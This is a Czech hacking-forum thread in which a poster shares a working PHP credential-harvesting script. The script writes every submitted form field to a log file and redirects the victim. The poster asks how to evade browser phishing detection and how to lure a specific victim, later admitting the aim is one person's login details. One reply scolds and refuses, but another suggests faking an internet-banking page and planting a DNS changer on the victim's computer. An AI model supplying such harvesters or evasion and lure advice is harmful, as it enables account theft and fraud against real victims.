Skrití phishingu

HackForum

Skrití phishingu#
Ahoj, začínám s phishingem. Už mám jistý prototyp, ale snad všechny prohlížeče (Kromě Internet exploreru) ho jsou schopné detekovat. Můj útok se skládá z html stránky a php scriptu.

Stránka: [link]

Script:------------------------------------
--------
<?php
header ('Location: [link]');
$handle = fopen("logs_28198.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "===============\r\n");
fclose($handle);
exit;
?>
-------------------------------------------
-------
Jak můžu zabránit detekci ?
Jak bych správně měl odkaz podstrčit konkrétní oběti ?
V jaké situaci se oběti nejčastěji nachytají ?
Předem dík za užitečné odpovědi :)

[Vím že je splácanina... Ale weby prostě nejsou můj obor :)]

yagarea
(odpovědět)
yagarea7.1.2015 21:08
re: Skrití phishingu#
Uz to, ze mas gramatickou chybu v nazvu prispevku vypovida o tom, ze jsi asi pekny dement. Kdyby jsi aspon potreboval poradit s PC nebo softwarem..., ale ty zde bezostysne pises, ze chces skodit lidem (protoze phishing k nicemu jinemu neni) a neni ti ani trapne nakonec napsat, ze vlastne weby nejsou tvuj obor...Tak proc se na to ptas? Chces jen skodit? Pokud te samotneho nenapadne jak "obeti podstrcit odkaz/kod" , jak "lidi nachytat", tak se nikdy nezmuzes na nic jineho nez rozesilani spamu, ktery bude lidi akorat otravovat a zadny zisk ti nakonec stejne neprinese....

Bez delat delnika a drz se lopaty...na vic stejne nemas....


Timto oficialne znovu prosim Cuminna , aby zrusil moderovani sekce HackFora - nema to opravdu cenu. Kazdy shit dotaz sem projde a akorat to zdrzuje konstruktivni odpovedi na konstruktivni otazky.

Dekuji.



(odpovědět)
nero_qs | | 165.254.255.*8.1.2015 19:10
re: Skrití phishingu#
No obeti by si mohol na to nalakať ak by to bola stranka to internet bankingu.
A keby si mal DNS changer na tom ur%citom PC a presmerovavalo to stranky na tvoje vlastne
(odpovědět)
extio | E-mail8.1.2015 20:01
Zkrití phishingu#
nero_qs |:
Za nepovšimnutou gramatickou chybu,která tak fatálně snížila dojem z dotazu se omlouvám.
Nechci škodit lidem... Chci jen dokázat konkrétní osobě, že si dokážu najít způsob k jeho přihlašovacím údajům. Jestli by se mi to povedlo,tak bych vše co se toho týkalo sprovodil z internetu.
"Jak lidi nachytat?" se ptám, abych se dozvěděl v jaké situaci by se moje oběť bez povšimnutí prozradila své přihlašující údaje.
To, že jsem napsal, že weby nejsou můj obor měla být i ironii osudu prevence před kamenování za úroveň stránky a kódu.
Co se týká zbytku tvého příspěvku, tiše s hanbou uznávám že máš pravdu...


extio:
Užitečná,informativní,konstruktivní a stručná odpověď. Díky

.cCuMiNn.: Není způsob jak by se mohli na cenzuře podílet i obyčejní uživatelé? Třeba tlačítko Lama.Když ho proklikne určitý počet uživatelů příspěvek se automaticky přiřadí do sekce Lame. Je pouhý návrh.

Vím, že je otázka pár hodin než proti mě někdo použije vlastní slova tak to zkrátím... Na závěr podotýkám jak si uvědomuji vlastní chybu a slibuji že se ji pokusím neopakovat...

(odpovědět)
yagarea8.1.2015 22:22
re: Skrití phishingu#
Nechci nijak moralizovat nebo tak nějak, ale řekl jsi, že chybu napravíš a místo toho tam přibyla další... Zkriti? :O
(odpovědět)
Giorgio | 37.48.39.*22.1.2015 3:27

Zpět
Svou ideální brigádu na léto najdete na webu Ideální brigáda
 
 
 

 
BBCode